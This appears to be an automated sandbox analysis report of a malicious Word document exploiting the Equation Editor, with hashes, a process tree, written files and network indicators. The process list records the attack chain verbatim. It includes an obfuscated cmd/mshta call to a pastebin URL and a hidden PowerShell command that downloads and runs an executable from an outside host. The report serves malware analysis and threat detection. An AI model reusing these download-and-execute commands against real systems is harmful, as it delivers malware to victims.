File name: | 06d038309382522dbd13574fddc26793.doc |
Full analysis: | https://app.any.run/tasks/7aa70431-6796-4b21-ad64-3af43f1d4fda |
Verdict: | Malicious activity |
Analysis date: | January 23, 2019, 09:48:17 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/octet-stream |
File info: | data |
MD5: | 06D038309382522DBD13574FDDC26793 |
SHA1: | 6CBA7D9445911D5DFC679AA93B585AEA45973B7E |
SHA256: | 6583482CE262A237FC248E8E0B9EB52581FAC1865996BE77850615B2BB016DA0 |
SSDEEP: | 192:6i27jaBAB7Y3xHSVce/QQiAJmzufkPqu3YHMj:t27jb7YBHNvwmK9cj |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2876 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\06d038309382522dbd13574fddc26793.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3260 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
3944 | cMd /C mS^Ht^a ht^tp^s:^/^/pastebin.com/raw/H28nZ13U | C:\Windows\system32\cMd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2360 | mSHta https://pastebin.com/raw/H28nZ13U | C:\Windows\system32\mshta.exe | cMd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2224 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('https://my.mixtape.moe/ishowl.htaa',$env:Temp+'\KRQVHK.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\KRQVHK.Exe') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3020 | "C:\Users\admin\AppData\Local\Temp\KRQVHK.Exe" | C:\Users\admin\AppData\Local\Temp\KRQVHK.Exe | — | powershell.exe |
User: admin Company: WIMPS3 Integrity Level: MEDIUM Exit code: 0 Version: 4.05.0007 | ||||
2276 | C:\Users\admin\AppData\Local\Temp\KRQVHK.Exe" | C:\Users\admin\AppData\Local\Temp\KRQVHK.Exe | — | KRQVHK.Exe |
User: admin Company: WIMPS3 Integrity Level: MEDIUM Exit code: 0 Version: 4.05.0007 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2876 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRECB6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2224 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ET3AMC6BP3B51EO7M8FQ.temp | — | |
MD5:— | SHA256:— | |||
2876 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{700E7C81-CAB8-4AC3-B180-FB3AFD783222}.tmp | — | |
MD5:— | SHA256:— | |||
2876 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0B4C83C6-5501-47DD-B1AB-326D74EA6C66}.tmp | — | |
MD5:— | SHA256:— | |||
2876 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{576A614F-C21C-4EB6-9D46-D72291918A7D}.tmp | — | |
MD5:— | SHA256:— | |||
2876 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D512D016B6D8FC09C9D73080393CD633 | SHA256:E12CC561D707114629B3DAA016753E27BBF4954359B14694E71C0926457DABF5 | |||
2224 | powershell.exe | C:\Users\admin\AppData\Local\Temp\KRQVHK.Exe | executable | |
MD5:494B14E7A620A733959E0520DCE37F38 | SHA256:BACB3014CD18854FE5B5F0C12643AA7F9A136DFF00CF0EF2B6AA65C850795FE1 | |||
2360 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txt | text | |
MD5:F4C1AFA857DC7FAFB1AB81B98C4F083E | SHA256:E9E591AA205A193ADB214E74DE21F552FCB4C22867C4533CD71D81701C48D108 | |||
2876 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AB80A426-2524-4C5C-BED8-1DFDE5A12155}.tmp | binary | |
MD5:3842B63E44EA20A68100B359D6AF7172 | SHA256:CD55A9C307F65B328A7CE106EB75F66FCDD5C73078E497D0B22BD3BA289B1A77 | |||
2224 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f85e.TMP | binary | |
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8 | SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2224 | powershell.exe | 206.81.100.99:443 | my.mixtape.moe | NapaNet | US | suspicious |
2360 | mshta.exe | 104.20.208.21:443 | pastebin.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| shared |
my.mixtape.moe |
| unknown |